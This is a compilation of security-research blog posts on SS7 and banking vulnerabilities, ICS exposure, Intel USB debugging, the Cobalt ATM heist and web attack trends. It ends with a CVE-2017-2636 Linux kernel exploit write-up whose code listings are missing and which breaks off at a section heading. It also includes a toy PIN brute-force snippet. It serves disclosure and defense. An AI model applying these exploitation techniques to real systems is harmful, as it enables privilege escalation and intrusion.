Most attacks on SS7 networks were successful due to the lack of verification of a subscriber’s actual location. Other major causes are the inability to check whether a subscriber belongs to a network, the absence of a filtering mechanism for unused signaling messages, and errors in SMS Home Routing configuration.


Average amount of successful attacks in an SS7 network (depending on a vulnerability type)

What to Do

The majority of flaws that allow an attacker to track a subscriber’s location and steal data could be fixed if operators change network equipment configuration and prohibit the processing of AnyTimeInterrogation and SendIMSI messages via HLR.

The way to mitigate architecture flaws in protocols and systems is to block undesired messages. A system must monitor the use of SendRoutingInfoForSM, SendIMSI, SendRoutingInfoForLCS, and SendRoutingInfo. Filtering will help to avoid the risks of DoS, SMS interception, call forwarding, and subscriber profile modification.

Not all indicated SS7 messages are dangerous. Operators need to configure filtering to cut off only undesired messages used in attacks, and implement additional security tools, for example, intrusion detection systems. These systems do not interfere with network traffic and are capable of detecting malicious activity and determining necessary configuration for message filtering.

You may find the full research here: www.ptsecurity.com/library/whitepapers/

Online Banking Vulnerabilities: Authorization Flaws Lead the Way



Online banking (OLB) systems are publicly available web and mobile applications, so they suffer from vulnerabilities typical of both applications and banking systems. Bank-specific threats include theft of funds, unauthorized access to payment card data, personal data, and bank secrets, denial of service, and many other attacks that can trigger significant financial and reputational losses.

This report synthesizes statistics that were gathered during OLB security audits performed by Positive Technologies in 2015. Comparison with the results obtained in 2013 and 2014 vividly illustrates the dynamics of information security development in modern OLB systems.

Cases

The research covered 20 OLB systems, including several financial services written in 1C that usually have vulnerabilities similar to those in online banking. The 20 OLB systems tested have all undergone a complete analysis including an operation logic audit. Most systems are designed for personal online banking (75%) and they include mobile banking systems consisting of server and client components (35%).

65% of the systems were developed by banks using Java (the majority of apps) and 1C (8%). The rest were implemented on platforms of well-known vendors. In order to comply with our responsible disclosure policy regarding vulnerabilities, no companies are named in this report.

Most OLB systems (75%) are operational and accessible to clients. The rest are testbeds, but ready for commissioning. 57% of OLB systems developed by well-known vendors are operational.

Vulnerabilities and Threats

The percentage of high-severity vulnerabilities has dropped from 44% (2013-2014) to 30% (2015), though the general level of OLB security remains low: high-severity vulnerabilities exist in almost every online banking service (90% of systems in 2015 vs 78% in 2013-2014).

More than half of the systems tested (55%) contain vulnerabilities that may lead to unauthorized access to user data. These security bugs are primarily caused by authorization flaws. The second most common flaw (50%) is insufficient session security (improper user session termination, incorrect cookie settings, multiple sessions under the same account, and lack of association between user sessions and client IP addresses).

The CVE-2015-1635 vulnerability, absent in 2013-2014, was detected in two OLB systems in 2015. It is caused by errors in HTTP.sys on Windows (see Microsoft bulletin MS15-034). By exploiting this flaw with specially crafted HTTP requests, hackers can execute arbitrary code or conduct a DoS attack.

The research also revealed threats that could be used against OLB systems if exploited together with other vulnerabilities detected. Thus, one of the systems allows a hacker to steal money via a combination of insufficient session security and two-factor authentication flaws.


Top OLB vulnerabilities (across systems)

25% of the investigated OLB systems are under threat of serious attack, including theft of money by an authorized user as a result of rounding attacks, unauthorized access to arbitrary user operations, and SQL injection. As a result, banks could suffer financial losses and damage to their reputation as a reliable partner. Over half of the systems (55%) allow an unauthorized user to access a DBMS containing personal and financial data.


OLB security issues

Commercial OLB Systems Became More Vulnerable

All commercial OLB systems appear to be exposed to high-severity vulnerabilities, a rate similar to personal OLBs (87%). The number of medium-severity vulnerabilities per commercial system has visibly increased since 2014. The security level of commercial OLB systems has dropped, while the security level of personal systems remains as low as in 2014.


Average number of vulnerabilities in personal and commercial systems

OLB Vendors Do Not Guarantee Security

OLB systems supplied by vendors contain 50% more source code bugs than OLBs developed by on-site programmers (40% vs 28%), though in-house OLBs have more vulnerabilities in program configuration (35% vs 27%). In 2013 and 2014, off-the-shelf OLBs had half as many security flaws (14%).

The number of high-severity vulnerabilities in online bank systems developed by vendors has dropped as compared to 2013-2014, but nonetheless all of these products have critical bugs.

OLB systems supplied by dedicated developers contain 1.5-2 times more vulnerabilities than in-house systems, as the latter are developed for a particular architecture and have set functionality, which makes them simpler and, thus, less vulnerable. However, switching from off-the-shelf to in-house systems does not mean that the newly developed OLB will be secure.


Vulnerabilities by severity for off-the-shelf and in-house systems

Production Systems are Vulnerable

Production systems contain fewer vulnerabilities than testbed systems in 2015, indicating that banks undertake some effort to secure their running applications. However, the security level of production OLB systems is not high: almost all of them contain high-severity threats. 40% of all vulnerabilities detected in production systems are highly dangerous.


Vulnerabilities of various severity in test and production systems

Flaws of Protection Mechanisms

A predictable ID format is typical of all OLB systems, and only 60% of them provide users with an opportunity to change it.

Two-factor authentication used for logon and transactions mitigates risks of users’ money being stolen, but 24% of systems do not use this mechanism at all and 29% of systems implement it incorrectly. Almost half of the in-house systems (45%) are vulnerable, and off-the-shelf systems also have this flaw (33%).

Over one third of OLB systems (35%) do not protect a session from hijacking and further exploitation.


Authentication vulnerabilities in off-the-shelf and in-house systems

iOS Banking Apps are Better

iOS applications are still more secure than Android apps, 75% of which are exposed to high-severity vulnerabilities; still, one third of the security bugs found in iOS apps are highly dangerous. These bugs are triggered by storing and transferring data in cleartext.


Application vulnerabilities by mobile OS

Each Android application contains 3.8 vulnerabilities (compare to 3.7 in 2013-2014), while each iOS application contains 1.6 vulnerabilities (2.3 in 2013-2014).


Top mobile banking vulnerabilities

Though the most common mobile OLB vulnerabilities are classified as medium severity, in some cases a combination of bugs can have a critical impact on the system. For example, if logon is performed via a short PIN code and session IDs are stored in the file system, a hacker with physical access to the device can spoof the web server’s response so that any PIN code entered, even an incorrect one, is reported as valid. A hacker can thus obtain full control over a user’s personal account, including changing settings or executing transactions. One of the systems tested allows a hacker to access a user’s mobile bank by exploiting insecure data transfer: the system accepts self-signed certificates while transferring data via HTTPS.
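The danger of a short PIN is easy to quantify: a 4-digit code has only 10,000 candidates, so once the verification step can be fooled or repeated freely, exhaustive search is instant. A minimal Python sketch (the PIN value and the check function are hypothetical stand-ins):

```python
from itertools import product

SECRET_PIN = "4831"  # hypothetical value, stands in for the device's PIN

def check_pin(candidate: str) -> bool:
    # Stand-in for the (spoofable or repeatable) verification step.
    return candidate == SECRET_PIN

def brute_force_pin(length: int = 4) -> str:
    # A 4-digit PIN has only 10**4 = 10,000 candidates.
    for digits in product("0123456789", repeat=length):
        candidate = "".join(digits)
        if check_pin(candidate):
            return candidate
    raise ValueError("PIN not found")

print(brute_force_pin())  # "4831"
```

This is why mitigations such as server-side attempt limits and non-spoofable verification matter far more than the PIN length itself.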

Conclusion

The security level of OLB systems remains low, though the total number of high-severity vulnerabilities has dropped as compared to 2013-2014.

The security bugs found in systems already put into production indicate the importance of secure software development lifecycle processes. Security audits of an OLB system should be performed not only prior to commissioning, but also during the course of its operational use. These audits should be regular (e.g. twice a year) and should involve control over elimination of detected flaws.

Off-the-shelf systems are of primary concern: in fact, they are more vulnerable than systems developed by on-site programmers. Banks should also use preventive protection such as web application firewalls. With commercially available systems, a WAF is required to prevent attackers from exploiting known vulnerabilities until the third-party vendor releases an update.

To access a user account, a hacker needs to use well-known flaws like insufficient session security. OLBs must ensure that the correct implementation of security mechanisms is used. It is important to implement secure development procedures and provide comprehensive testing at the acceptance stage.

Considering this report's finding that the severity of source code vulnerabilities remains relatively high, it is necessary to regularly check OLB security via white-box testing (including automated tools) or other techniques.

Full research is available at www.ptsecurity.com/library/whitepapers/

Industrial Control Systems 2016 Report: Connected and Vulnerable

Industrial control systems (ICS) are part and parcel of everyday life, from smart homes to nuclear power stations. ICS bridge the gap between the digital world and the physical world by interpreting the commands that control turbines, switches, valves, and more. Because these systems are complex, critical to infrastructure, and often Internet-connected, they make a very tempting target for hackers.

The number of vulnerable ICS components grows every year. Nearly half of the vulnerabilities identified in 2015 are high-risk – and the majority of vulnerabilities were found in the products of the most well-known vendors. Widespread poor security practices, such as default passwords and dictionary-guessable passwords, make it easy for outsiders to access the systems and gain control.


These are the sobering conclusions of research by Positive Technologies, which analyzed data on ICS vulnerabilities from 2012 to 2015, as well as information on the Internet availability of ICS components in 2015. Below is a summary of the findings.

Methods

The source material consisted of publicly available information such as vulnerability databases (ICS-CERT, NVD, CVE, Siemens Product CERT, Positive Research Center), vendors’ advisories, exploit databases and packs (www.exploit-db.com, www.rapid7.com/db/ etc), conference presentations, and publications on blogs and industry sites. CVSSv2 was used to assess vulnerability severity.

To collect information on the online availability of ICS components, researchers scanned Internet-accessible ports using publicly accessible search engines: Google, Shodan, and Censys. Once collected, the data was subjected to additional analysis to determine a relationship to ICS equipment. Positive Technologies specialists created a database of ICS identifiers, consisting of approximately 800 entries that allow inferring the product and vendor from the banner.
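The banner-to-product lookup can be pictured with a toy sketch (a minimal Python illustration; the identifier entries below are invented, whereas the real database holds about 800 of them):

```python
# Toy excerpt of an ICS identifier database: banner substring -> (vendor, product).
# These entries are invented for illustration only.
ICS_IDENTIFIERS = {
    "niagara web server": ("Tridium", "Niagara Framework"),
    "modbus bridge": ("ExampleVendor", "Modbus Gateway"),
}

def classify_banner(banner: str):
    """Return (vendor, product) if the service banner matches a known identifier."""
    lowered = banner.lower()
    for needle, identity in ICS_IDENTIFIERS.items():
        if needle in lowered:
            return identity
    return None  # banner not related to known ICS equipment

print(classify_banner("HTTP/1.1 200 OK\r\nServer: Niagara Web Server/3.5"))
print(classify_banner("Server: nginx"))  # None: not an ICS banner
```

In practice, substring matching is only the first pass; version strings in the banner are then parsed to correlate the component with known vulnerabilities.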

Results

In total, vulnerabilities in components from approximately 500 ICS vendors were considered. 743 vulnerabilities were found in all. In 2015, experts at Positive Technologies independently discovered 7 new vulnerabilities (2 of them high-risk) and notified the relevant vendors.

As noted in our previous report, SCADA Safety in Numbers, between 2009 and 2012 the number of discovered ICS vulnerabilities increased more than 20-fold (from 9 to 192). In recent years (2012–2015), the number of vulnerabilities discovered each year has remained stable at approximately 200. This is the result of increased interest by vendors in addressing vulnerabilities and interacting with the security community.


Total number of vulnerabilities discovered in ICS components 

The vendors of the most vulnerable ICS components, in terms of number of vulnerabilities found, are Siemens, Schneider Electric, and Advantech. However, these numbers paint only a partial picture: they depend on the prevalence of the product and on whether the vendor practices responsible disclosure. Therefore, these figures cannot be used to judge the degree of security of particular solutions from any particular vendor.



Number of vulnerabilities in ICS components (by vendor)

The largest number of vulnerabilities was identified in SCADA components and programmable logic controllers (PLCs), industrial network devices and engineering software, human–machine interfaces (HMIs), and remote access and management terminals. These results show little change from 2012.

Most vulnerabilities are of either high or medium risk (47% high, 47% medium). Looking at the degree of risk based on the feasibility of threats to confidentiality, integrity, and availability, over half of the vulnerabilities score as high-risk on the important availability metric. Threats to availability, combined with the possibility of remote exploitation and weak authentication mechanisms, substantially increase the risk of damaging ICS attacks.



Distribution of vulnerabilities (by risk)

Data on vulnerability fixes is not published, so Positive Technologies researchers relied on information provided by the vendors themselves. Detailed information on the vulnerabilities already fixed by vendors is provided on the company website. 2015 data shows that only 14% of vulnerabilities were resolved within three months, while 34% waited over three months and the remaining 52% either were never repaired, or the date of repair was not given by the vendor.



Repair timeline for vulnerabilities identified in ICS components

However, published exploits are available for only 5% of known vulnerabilities. This is an improvement over 2012, when exploits could be found for 35% of vulnerabilities.

Most vulnerabilities fall into the categories of DoS, Remote Code Execution, and Buffer Overflow. Exploitation of these vulnerabilities by an intruder could cause equipment failure or unsanctioned operation of the equipment, which is equally undesirable given the reliability requirements and sensitivity of ICS components.


Most common types of vulnerabilities in ICS components

As of March 2016, 158,087 ICS components were available online. Most of these components were accessible via HTTP, Fox, Modbus, and BACnet, and in most cases, a dictionary password was used for authentication.

The largest numbers of Internet-available ICS components were found in the USA (43%), Germany (12%), and France, Italy, and Canada (approximately 5% each). The low number of ICS components found in Asia is due to the use of local solutions that are little known outside of their home markets. Russia placed 31st, with 600 available components (less than 1% of the total).


Number of Internet-available ICS components (by country)

The largest vendors of the found Internet-available ICS components are Honeywell (17%), SMA Solar Technology (11%), and Beck IPC (7%). Among Internet-available components, the most common are building automation systems from Tridium, a Honeywell company (25,264), and energy management systems, including photovoltaics from SMA Solar Technology (17,275).

Positive Technologies researchers were also able to “find” automated control systems responsible for manufacturing processes, transportation, and water supply. In many cases, intruders would not even need any special knowledge to gain access. Of the ICS components found online, only two thirds can be reasonably described as secure.


Breakdown of vulnerable vs. secure Internet-available ICS components 

These results suggest that the protection of ICS against cyberattacks in 2016 is still deficient. Even basic security hygiene – such as using complex passwords and disconnecting ICS components from the Internet – goes a long way toward preventing attacks with potentially enormous consequences.

Full text of the “Security Trends and Vulnerabilities Review. Industrial Control Systems” report is available at www.ptsecurity.com/library/whitepapers/

Protecting the Perimeter: Old Attacks Work Just as Well as New Ones

When we think about external threats to information security, often our first thoughts are of hacker attacks on the network perimeter—say, advanced persistent threats (APTs) targeting large companies and governments. One example is the compromise of the Equation Group with publication of some of the group's tools for breaching the network perimeter. But as it turns out, many of the exploits have been known for a long time, although the “cherry on the cake” was a zero-day vulnerability for SNMP services (with SNMP standing for “Security Not My Problem”). While we do not have a full list of the compromised exploits, we can start with the other end of the equation by evaluating the state of protection of corporate perimeters with the help of real-world vulnerability statistics.

One such study was presented at PHDays VI as part of Positive Research 2016. The sample spanned approximately 10,000 accessible addresses and 15,000 vulnerabilities over a two-year period (2014–2015). Note that these numbers include ONLY network perimeters with above-average security. Only companies with asset inventory and vulnerability management processes (which, in turn, enable collecting statistics) were included.

Let's start with the “sexiest” morsel from the published exploit pack: the SNMP 0-Day. Is this something to be worried about? Our study shows that the answer is “yes”. A few reasons:

  • Our analysis based on honeypot systems shows that SNMP services are very popular with would-be intruders. Many hackers are well aware of the availability of these services, and those who don't know yet need only Shodan to find out.
  • SNMP services are numerous and accessible on most modern network infrastructures. We have written previously how exploitation of SNMP vulnerabilities allows intruders to gain a foothold on the internal networks of telecom operators.
  • Many SNMP services are running on obsolete software. Our research showed that in the category of DNS/NTP/SNMP services, the vulnerability rate reaches one in ten:


Based on these statistics, we clearly see that the SNMP exploit is very dangerous and can be used to breach the network perimeter of many companies and organizations.

But there remains another interesting question. Why would the toolkit of the Equation Group, which has been described as a “full-fledged nation-state cyber-arsenal,” contain so many exploits for old vulnerabilities for which patches were issued over five years ago? If this hacker group is so amazing, shouldn't they be using new, unknown vulnerabilities?

The answer is paradoxically simple once we restate the question. Why should hacker groups waste their precious time on finding zero-days if many Internet-accessible systems have not been updated for years?

Our study showed that three quarters of all the vulnerabilities found were over one year old; 30% were over five years old. Almost one in ten vulnerabilities were fixed a whopping ten years ago! During the time period of our research, vulnerabilities were found on 37% of systems.


A successful attack does not require using the latest-and-greatest vulnerabilities. Old ones will do the job just as well and are cheaper too. And importantly, potentially drawing attention to an old vulnerability is a much easier choice for an attacker than risking a precious zero-day.

But so far we have been looking only at exploits in non-public packs. What about exploits for old vulnerabilities available publicly, such as from MSF? To answer this question, we selected vulnerabilities with a CVSS rating of “High” that were present at the beginning of the research period on the test systems. We then cross-referenced them with known exploit packs.


The data shows that the tested perimeters are vulnerable to publicly available exploits. However, this sample contains a very small number of vulnerabilities. Does this actually mean that there are not many of them? As mentioned above, the breakdown of vulnerabilities in the previous figure reflects only the start of the study period, even though perimeter security is constantly in flux. The following charts show the change in security level over two years:


To summarize: breaching network perimeters with above-average security does not require non-public exploits, much less secret zero-days by APT groups. Standard tools and basic knowledge are more than enough in many cases.

How to stay protected

Based on our findings, we propose several main points for increasing the overall level of protection of the network perimeter:
  1. Constant monitoring of the network perimeter, resulting in timely awareness of the services that are on the perimeter and Internet-accessible.
  2. Automated search for vulnerabilities in perimeter services, resulting in identification and eventual elimination of vulnerabilities.
  3. Removal of services from the perimeter when there is no compelling need for them. These services may include NTP, SNMP, database management, administration interfaces, and other potentially dangerous services.
  4. Implementation of a patch management policy, prioritizing systems with vulnerabilities for which exploits are publicly available as well as the most vulnerable systems. Remaining systems should be updated based on vulnerability and system criticality priorities.
  5. A comprehensive approach to information security. Protecting the network perimeter is a vital part of security, but the perimeter is by no means the only vector for intruders to gain access to company infrastructure.
Read the full version of our report on Corporate Perimeter Protection here: https://www.ptsecurity.com/upload/iblock/9db/network_perimeter_eng.pdf


Intel debugger interface open to hacking via USB


New Intel processors contain a debugging interface accessible via USB 3.0 ports that can be used to obtain full control over a system and perform attacks that are undetectable by current security tools.

A talk on the mechanisms needed for such attacks and ways to protect against them was given by Positive Technologies experts Maxim Goryachy and Mark Ermolov at the 33rd Chaos Communication Congress (33C3) in Hamburg, Germany.

The problem

Manufacturer-created hardware mechanisms, such as motherboard debugging interfaces, have legitimate purposes, including debugging of hardware configuration and other beneficial uses. But these low-level mechanisms can also be exploited by attackers without special equipment or huge resources.

Our experts analyzed and demonstrated one of these mechanisms in their presentation. The JTAG (Joint Test Action Group) debugging interface, which can be accessed via USB, has the potential to enable dangerous and virtually undetectable attacks. JTAG works below the software layer and is intended for hardware-level debugging of the OS kernel, hypervisors, and drivers. That same CPU-level access, however, can be abused for malicious purposes.

On older Intel CPUs, accessing JTAG required connecting a special device to a debugging port on the motherboard (ITP-XDP). JTAG was difficult to access for both troubleshooters and potential attackers. However, starting with the Skylake processor family in 2015, Intel introduced Direct Connect Interface (DCI), which provides access to the JTAG debugging interface via common USB 3.0 ports.

An attacker could use this mechanism as a backdoor and bypass all security systems; JTAG allows embedding code at a certain point in time, reading all data, and also making the machine inoperable (for example, by re-writing the BIOS).

To be successful, the attacker must know that the DCI interface is activated on the victim’s computer (relevant methods are described in the presentation). The researchers did not see any signs of motherboard vendors shipping their products with DCI activated, but nothing stops cybercriminals from enabling DCI at any time via BIOS modification or from the operating system via the P2SB device.

In fact, this JTAG debug capability can also be chained with a specially crafted USB device as part of an even more sophisticated attack. A cybercriminal can create a "bad" USB device that looks like an ordinary USB drive, but once connected to a USB 3.0 port it obtains full access to the victim’s PC in addition to acting as a storage device, with no further action required. It also remains totally hidden: unlike some less-advanced malicious USB devices, the mouse and keyboard show no signs of manipulation.

The experts described how such attacks could work in the real world: "For example, you order a number of laptops with U-series CPUs for your company. The bad guys interfere with the purchasing process, activate DCI at any time via BIOS or with special activation code on a target system, and all the testing is successfully passed (correct BIOS version, everything matches, all disks are encrypted, etc.). Then an insider with a malicious USB device plugs the device into one of these laptops at the company and gets full access while no one is watching".

Positive Technologies’ experts reported this case to Intel, and here is what the company’s Product Security Incident Response Team replied:

Intel implemented a proprietary Intel® Direct Connect Interface (DCI) over USB for JTAG debugging of closed chassis systems as a feature for 6th and 7th Gen Intel® Core™ processor based platforms. DCI is an integral part in enabling debug of today's light and small form factor systems via industry standard JTAG protocols. To provide additional security, the DCI interface is disabled by default per Intel specification and can only be enabled with user consent via BIOS configuration. Physical access and control of the system is required to enable DCI, however even when enabled, access to Intel confidential capabilities of the JTAG debugging commands is not possible without proprietary keys obtained via Intel license agreement.

Demo and slides

To date, this JTAG mechanism has been shown to be exploitable only on Intel U-series processors. Video of the presentation given at 33C3 can be found below:


Here is the demo attack:


And presentation slides:



Security reflections from Mobile World Congress


Michael Downs, Director of Telecoms Security, EMEA

Mobile World Congress is not just a name, it is perfectly descriptive.  The entire mobile world squeezes into a few square kilometres of Barcelona for four days. Given this concentration of senior execs, it’s a good place to form an opinion on industry trends and try to understand the place security has in the future of mobile.    

Transport was a massive theme this year.  Someone mentioned there were more car companies here than at a recent major motor show, and everything from chip-set manufacturers to infrastructure providers were touting their connected mobility play.  It seems to be the most obvious large scale early application for the Internet of Things as companies see problems that can be solved with data connections, namely accidents, congestion and general resource waste. The promise is great. 

However, from a security point of view, I got the impression that the priorities for many of these propositions were traditional elements such as speed to market, UI efficiency, functionality, hardware power, and connection speeds. Not many of the people on the booths I questioned could truly answer what they were doing to keep connected cars, trucks, and buses secure from abuse. Maybe it was an unfair question, but given the scale of what is being proposed, this raised a few eyebrows amongst our experts. The consequences of attacks on a fleet of trucks, or the targeting of a car’s systems, don’t bear thinking about. Theoretically, such attacks are possible in the same way an attacker would abuse existing Diameter or SS7 networks. Everything is assigned a number in the network, the same way a phone is, providing a marker from which to develop an attack profile.



This theme grows further when you look at the underlying narrative of the show as a whole: attaching a data connection to everything. Lots of marketing dollars were spent on tiny models of everything from stadiums to entire cities. This is enabled by the hopes the industry has for emerging protocols such as 5G and LTE-M. More capacity and higher speeds mean more things can now talk to the Internet.



This is good for the mobile industry, but also for attackers, as more connected things simply mean a larger attack surface to work on. As we demonstrated at our expert dinner, we believe too many vulnerabilities are still present, both in the underlying infrastructure that carries data and in the radio delivery from base station to user. This will only be compounded as more things become connected at the application level, driven by increased digitization and the use of emerging web technologies.

From a signalling (SS7 and Diameter) point of view, the underlying infrastructure to support this brave new world is vulnerable, and becoming easier and cheaper for an attacker to access. For dollars per day, bad actors can now buy access to core telecoms networks on the black market and exploit either existing flaws or new ones. Once inside, all that is needed is the phone number (MSISDN) of your target or targets, be it a person or a fleet of connected cars, to manipulate the commands accordingly. The move towards new protocols will only present new opportunities for bad actors, who are notoriously creative and persistent.

There are also weaknesses from a radio frequency point of view, as vulnerabilities exist in the vast majority of communication protocols and their implementations. Again, as we saw at our experts’ dinner, armed with just a Raspberry Pi, a chipboard bought for a few dollars, and some Python script, data can be sniffed, intercepted, even decrypted on the fly and altered to carry out the whim of the attacker. Whilst we demonstrated some of this on a toy drone, it is important to note that the same protocols are used in the delivery of the entire gamut of ‘things’ connected by mobile networks. This means everything from industrial control systems to cars.

This is not intended to be a doomsday rant. These are points we, as a research-based security company, believe should be on the mind of the mobile industry. Many believe we are on the edge of a new industrial revolution. If this is true, then the old mantra that security needs to be built into the heart of things has never been truer. We look forward to helping make sure the brave new world the mobile industry is creating is kept safe and can flourish for everyone’s benefit.


Cobalt: How Criminals Hacked ATMs



Image: redspotted | Flickr

Following an extensive investigation, cyber security company Positive Technologies has today revealed how hackers were able to steal the equivalent of £28,000 ($35,000) overnight from six ATMs of an Eastern European bank. Its findings confirm that the theft could have been far worse: the technique used in the scam fortunately "clashed" with the financial institution’s existing NCR ATM software, preventing the attackers from withdrawing further funds. The company also warns that this group is likely to become active in the West soon.


"Attacks against ATMs are often a preliminary step, from which attackers aim to infiltrate a bank’s network infrastructure," explains Alex Mathews, Lead Security Evangelist at Positive Technologies. "Modern day 'bank robbers' have realized that many financial institutions fail to adequately invest in security, and that some will even do the bare minimum to comply with required standards. The result is that, from an initial compromise, attackers can often move sideways, burrowing deeper into the network and infecting other systems within the banking infrastructure. Having gained control over key servers and ATM management systems, these criminals will often hit the jackpot with minimal effort and without tripping any alarms. Our investigation found that, for this Eastern European bank, the initial compromise was facilitated by a phishing scam and was successful as employees were spoofed into deploying the malware. This allowed the bank's local network to be compromised with the installation of malware on ATMs from the bank's internal infrastructure."

Publishing the findings of its investigation in an analytical report titled "Cobalt—a new trend or an old 'friend'?" Positive Technologies reveals the intricacies these modern cyberattacks utilized when targeting this bank, and that could be used against other financial institutions:

1. Attackers tend to use known instruments and the integrated functionality of operating systems. In this heist, the criminals used commercial software: Cobalt Strike, which includes Beacon, a multi-function remote access Trojan with extensive capabilities for remote system control, enabling file upload and download, privilege escalation, and other functionality. The bank robbers also used Ammyy Admin, a legitimate freeware tool, together with Mimikatz, PsExec, SoftPerfect Network Scanner, and TeamViewer.

2. Phishing emails are still one of the most successful attack vectors due to insufficient security awareness amongst employees.


The initial infection vector was an employee opening documents.exe, a malicious executable delivered in a RAR archive attached to an email. Targeted mass phishing emails had been sent during the preceding months to a number of the bank’s email addresses, with messages imitating financial correspondence or security notifications. Several employees opened the malicious file at different times, but on the workstation of the employee who launched the malware successfully, either the antivirus engine had been disabled or the antivirus databases were outdated, allowing the malware to deploy.

3. Targeted attacks are becoming increasingly well-organized and distributed. The investigation revealed that the attack first started during early August. At the beginning of September, after a steady deployment in the infrastructure, the hackers launched a chain of attacks to detect which of the workstations were used by employees responsible for the ATM operation and payment card use. It was only in early October that the attackers uploaded malware to the ATMs and performed the heist (an operator sent commands to ATMs, and drops (individuals acting as cut-outs) visited an ATM at an appointed time to collect the stolen cash). The malware installed on the ATMs was specialized, dispensing money from an ATM to a drop at the command of the attacker. Drops themselves did not need to perform any special manipulations of the ATM.

While investigating the incident, Positive Technologies gathered multiple host and network indicators of compromise, which were sent to the relevant authorities, so that the information could be shared with other financial institutions to prevent similar future attacks.

Full research: www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf


Web application attack trends: government, e-commerce, and finance in the spotlight


Positive Technologies has revealed how hackers attacked web applications throughout 2016. The aim of our research was two-fold: to determine which attacks are most commonly used by hackers in the wild, and to find out which industries are being targeted and how. With this data, organizations can be more aware of digital threats and protect themselves accordingly.


Statistics


Of the data analyzed, government was by far the most threatened sector, logging nearly 70 times more attacks per day than industrial systems, the sector with the fewest. For governmental institutions, more than 70% of attempts were Path Traversal attacks. This relatively simple attack lets hackers reach vulnerable file system directories and potentially compromise files stored on servers.

E-commerce sites, characterized by an abundance of web applications, saw the second-highest average number of attacks in the sample day analyzed. The finance sector rounded out the top three in terms of daily attack volume, with the sample set registering an average of around 1,400 attacks per day. The transportation and IT companies analyzed had to withstand about 680 attacks per day on average.

Number of attacks per day by sector


The most targeted sectors (in terms of attack volume) also saw the highest number of manual attacks. Nearly all (99%) of attacks against e-commerce sites did not use automated software at all, potentially indicating a diverse range of isolated actors undertaking low-level attempts to exploit web application vulnerabilities.

A similarly high percentage of compromise attempts on governmental web applications also had manual origins. By contrast, most attacks across all remaining industries are performed with the help of specialized vulnerability detection software. Automated scanning includes attempts to perform various attacks such as SQL Injection and Path Traversal using security analysis tools.

Automated scanning vs. manual attacks

The most common attacks detected were SQL Injection and OS Commanding, which allow a deeper level of compromise. Such attempts were recorded on over 80% of systems. The third-most common attack type was Path Traversal. Taken together, the prevalence of these more “primitive” techniques shows that hackers tend to focus on simple attacks with low barriers to entry.

Most popular attacks (% of web applications attacked)

Conclusion

Here is the summary of key findings:

  • Governmental organizations and e-commerce companies showed themselves to be particular targets. These two sectors are also subjected to the highest level of manual (non-automated) compromise attempts.
  • Attack types are tailored to specific sectors. For example, e-commerce sees a mix of attempts designed to cause downtime and access internal files. By contrast, 65% of all attacks in the finance sector attempt to steal the login information of website visitors.
  • Sectors seeing the lowest attack volumes, conversely, see the highest volume of automated web attacks from hackers, who use specialized software to search for vulnerabilities automatically.
  • Easy-to-execute methods such as SQL Injection and OS Commanding are the most commonly used methods across all sectors. Rarer attacks include Arbitrary File Execution and Cross-Site Request Forgery. 

Full report: www.ptsecurity.com/upload/corporate/ww-en/analytics/Web-Application-Attack-Trends-2017-eng.pdf 

CVE-2017-2636: exploit the race condition in the n_hdlc Linux kernel driver bypassing SMEP


This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).

This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.

Currently the flaw is fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch is backported to the stable kernel versions too.

I've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains a root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but does not cope with Supervisor Mode Access Prevention (SMAP), although that is possible with some additional effort.

My PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy's implementation).

First of all let's watch the demo video!



The n_hdlc bug

Initially, the N_HDLC line discipline used a self-made singly linked list for data buffers and kept an n_hdlc.tbuf pointer for retransmitting a buffer after an error. It worked, but the commit be10eb75893 added data flushing and introduced racy access to n_hdlc.tbuf.

After a TX error, concurrent flush_tx_queue() and n_hdlc_send_frames() both use n_hdlc.tbuf and can put the same buffer on tx_free_buf_list twice. That causes an exploitable double-free error in n_hdlc_release(). The data buffers are represented by struct n_hdlc_buf and allocated from the kmalloc-8192 slab cache.

To fix this bug, I used a standard kernel linked list and got rid of the racy n_hdlc.tbuf: in case of a TX error, the current n_hdlc_buf item is put back after the head of tx_buf_list.

I started the investigation when I got a suspicious kernel crash from syzkaller. It is a really great project that has helped fix an impressively long list of bugs in the Linux kernel.

Exploitation

This article is the only way for me to publish the exploit code. So please be patient and prepare for plenty of listings!

Winning the race


Let's look at the code of the main loop: we are going to race until success.


The loop counter is incremented on every iteration, so the tmo1 and tmo2 variables change too. They are used to create lags in the racing threads, which:

  1. synchronize at the pthread_barrier,
  2. spin the specified number of microseconds in a busy loop,
  3. interact with n_hdlc.

Colliding the threads this way helps hit the race condition sooner.


Here we open a pseudoterminal master and slave pair and set the N_HDLC line discipline for it. For more information about that, see man ptmx, Documentation/serial/tty.txt and this great discussion about pty components.

Setting the N_HDLC ldisc for a serial line causes autoloading of the n_hdlc kernel module. You can get the same effect using the ldattach daemon.


Here we suspend the pseudoterminal output (see man tty_ioctl) and write one data buffer. The n_hdlc_send_frames() fails to send this buffer and saves its address in n_hdlc.tbuf.

We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:

  • thread 1: flush the data with ioctl(ptmd, TCFLSH, TCIOFLUSH);
  • thread 2: start the suspended output with ioctl(ptmd, TCXONC, TCOON).

In a lucky case, they both put the single written buffer pointed to by n_hdlc.tbuf onto tx_free_buf_list.

Now we return to CPU 0 and trigger the possible double-free error:


We close the pseudoterminal master. The n_hdlc_release() goes through n_hdlc_buf_list items and frees the kernel memory used for data buffers. Here the possible double-free error happens.

This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree().

The final part of the main loop:


Here we try to exploit the double-free error by overwriting struct sk_buff. In case of success, we exit from the main loop and run the root shell in the child process using execve().

Exploiting the sk_buff


